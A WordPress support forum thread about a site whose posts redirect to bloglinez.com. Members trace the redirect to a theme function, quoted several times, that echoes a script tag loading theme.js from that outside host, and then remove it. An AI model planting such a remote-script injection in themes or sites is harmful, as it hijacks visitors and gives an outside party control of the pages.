WordPress.org

Ready to get started?Download WordPress

Forums

Is my site hacked? (36 posts)

  1. moemontreal
    Member
    Posted 2 years ago #

    hi guys im freaking out, all my posts are redirecting to this website: http://www.bloglinez.com/

    All my post show but when i click on a post it goes to this site: http://www.bloglinez.com/

    How can i fix this?

  2. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    It would help if you told us the url of your site.

  3. moemontreal
    Member
    Posted 2 years ago #

  4. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    I can't find an sign of malware on your site but it does look like your .htaccess file may have been hacked. Have you spoken to your hosts about this?

  5. moemontreal
    Member
    Posted 2 years ago #

    No i don't know what to do...

    Is there anything i can do myself?

    could i delete my .htaccess file? or change something?

    Here is the file info:
    Options All -Indexes

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /news/
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /news/index.php [L]
    </IfModule>

    # END WordPress

  6. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    Contact your hosts. This appears to be a hack at the server level.

  7. moemontreal
    Member
    Posted 2 years ago #

    The site is working fine now, i called the hosting company and they didnt find anything wrong.

    What can i do now? the site is back to normal but its suspicious, how can i protect the site.

    I have
    login lockdown
    firewall
    wp-Malwatch
    WSD Security plugins installed

    Plus i have a directory password on (wp-admin) folders.

    What els can i do?

  8. moemontreal
    Member
    Posted 2 years ago #

    it came back :(

    i dont know what to do im going nuts

  9. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    The site is working fine now, i called the hosting company

    Hmm... so the site started working normally after you contacted your hosts? I'd be willing to place a smaller wager that is was just a screw up at their end.

  10. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    What happens if you reset your custom permalinks back to the default setting via Settings -> Permalinks and rename your .htaccess file?

  11. vancoovur
    Member
    Posted 2 years ago #

    You can prevent this from happening again by editing your 'functions.php' file. Look for this:

    function my_settings() {
    echo '<script src="http://www.bloglinez.com/theme.js" type="text/javascript"></script>';
    }

    Then change it to this:

    function my_settings() {
    // echo '';
    }

    It will no longer access theme.js on the bloglinez.com server (which is basically a script to redirect your theme) and you should have no further problems.

  12. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

  13. moemontreal
    Member
    Posted 2 years ago #

    I did the changes but still redirecting to that dumb site http://www.bloglinez.com/

  14. vancoovur
    Member
    Posted 2 years ago #

    Another reason to avoid those nasty 'free' WP themes.

  15. vancoovur
    Member
    Posted 2 years ago #

    Moemontreal...it's working ok from here (and there's no longer a reference to bloglinez.com in the page)

  16. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    @moemontreal: Where did you download this theme from?

  17. vancoovur
    Member
    Posted 2 years ago #

    I was just in the midst of trying to find out where I got it when I found this post (I downloaded 'HotGoss' a few months ago and started having a problem this morning). I'm still searching and will advise if/when I find the source.
    I'm guessing that the redirect is switched on and off at whim to route traffic to the target site. Once they have enough people using the theme they start throwing the switch.

  18. moemontreal
    Member
    Posted 2 years ago #

    Moemontreal...it's working ok from here (and there's no longer a reference to bloglinez.com in the page)

    Yeah thanks a lot man i found the script in the 'functions.php' file
    i replaced it with the code u give me and it works fine now.

    @esmi thanks for the help too u guys are great.

    I bought the theme from a local web designer 3 years ago and i tweaked it my self. Why?

    Yeah i need to know where did it come from? i changed my Cpanel password and all the ftps and i will also change my (WP-ADMIN) directory password as well.

    Any more tips so i can sleep well tonight? :)

  19. vancoovur
    Member
    Posted 2 years ago #

    The code wasn't added to your site...It's been there all the time. They just flipped the switch using the target js and your site started redirecting. It will be fine now you've removed the function so sleep soundly.

  20. vancoovur
    Member
    Posted 2 years ago #

    BTW...cool sports site.

  21. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    I'd love to see a sample of one of these themes to see if there's a way of mass fingerprinting/identifying the hack.

  22. vancoovur
    Member
    Posted 2 years ago #

    I can upload to server or email if you like but with one line of code in a previously legit (and now unavailable) theme, chances are slim.

  23. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    If you have a copy, can you mail it to esmi[at]quirm dot net? It could be that the hackers are re-releasing genuine free GPL themes (and we've certainly come across that before).

  24. moemontreal
    Member
    Posted 2 years ago #

    Guys one last thing

    now im getting an error

    /home/nilespo1/public_html/news/wp-content/themes/2011ie/single.php on line 21

    check it out, its all they way at the bottom of the page.
    http://nilesports.com/news/2012/04/13/live-arabs-talent-episode-2-episode-2/

    BTW...cool sports site.

    Thanks man

    Also i will check in my previews backups if that line/script in the Founctions.php file was there before, and i will let u guys know

  25. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    Fatal error: Call to undefined function mt_misc_header() in /home/nilespo1/public_html/news/wp-content/themes/2011ie/single.php on line 21

    Did you accidentally remove too much when you edited the hack function?

  26. moemontreal
    Member
    Posted 2 years ago #

    Did you accidentally remove too much when you edited the hack function?

    I replaced:

    function mt_misc_header() {
    	echo '<script src="http://www.bloglinez.com/theme.js" type="text/javascript"></script>';
    }

    With

    function my_settings() {
    // echo '';
    }

    I dont know what went wrong!!!

  27. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    No. Replace your change with:

    function mt_misc_header() {
    	echo '';
    }
  28. moemontreal
    Member
    Posted 2 years ago #

    Well now i changed it to:

    function mt_misc_header() {
    // echo '';
    }

    And its fixed, can you please check if it works fine on your side too.

    Thanks.

    Moe.

  29. vancoovur
    Member
    Posted 2 years ago #

    moemontreal...loads find at my end (some errors but mostly missing images having nothing to do with your theme)

  30. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    No error here either.

Topic Closed

This topic has been closed to new replies.

About this Topic